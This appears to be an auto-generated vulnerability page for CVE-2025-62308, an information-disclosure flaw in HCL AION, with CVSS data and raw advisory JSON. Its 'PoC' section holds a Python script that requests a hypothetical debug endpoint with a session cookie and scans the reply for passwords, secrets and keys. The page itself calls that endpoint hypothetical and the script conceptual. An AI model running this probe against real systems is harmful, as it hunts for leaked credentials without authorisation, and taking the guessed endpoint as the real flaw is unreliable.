Security Vulnerability Report
CVE-2025-62308 CVSS 5.1 MEDIUM

CVE-2025-62308

Published: 2026-05-14 17:16:18
Last Modified: 2026-05-14 17:22:47

Description

HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may potentially assist in further analysis or targeted actions under certain conditions.

CVSS Details

CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

HCL AION (for the specific affected versions, refer to vendor advisory KB0130636)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-62308 (Conceptual)
# This script demonstrates a potential request that triggers information disclosure.
# Note: Actual parameters and endpoints require specific environment analysis.
import requests


def check_info_disclosure(target_url, session_cookie):
    """
    Attempts to access a vulnerable endpoint that exposes backend infrastructure details.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Cookie": session_cookie,
        "Accept": "application/json, text/plain, */*"
    }
    # Hypothetical endpoint based on information disclosure patterns
    vulnerable_endpoint = "/api/internal/config/debug"
    try:
        response = requests.get(f"{target_url}{vulnerable_endpoint}", headers=headers, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Potential vulnerability detected!")
            print("[+] Response content:")
            print(response.text)
            # Check for sensitive keywords in response
            sensitive_keywords = ['password', 'secret', 'key', 'internal', 'infra', 'config']
            found_keywords = [word for word in sensitive_keywords if word.lower() in response.text.lower()]
            if found_keywords:
                print(f"[!] Sensitive data found: {', '.join(found_keywords)}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target and credentials
    target = "http://example-hcl-aion.com"
    cookie = "session_id=low_priv_user_token"
    check_info_disclosure(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62308", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:17.913", "lastModified": "2026-05-14T17:22:46.577", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may potentially assist in further analysis or targeted actions under certain conditions"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636", "source": "[email protected]"}]}}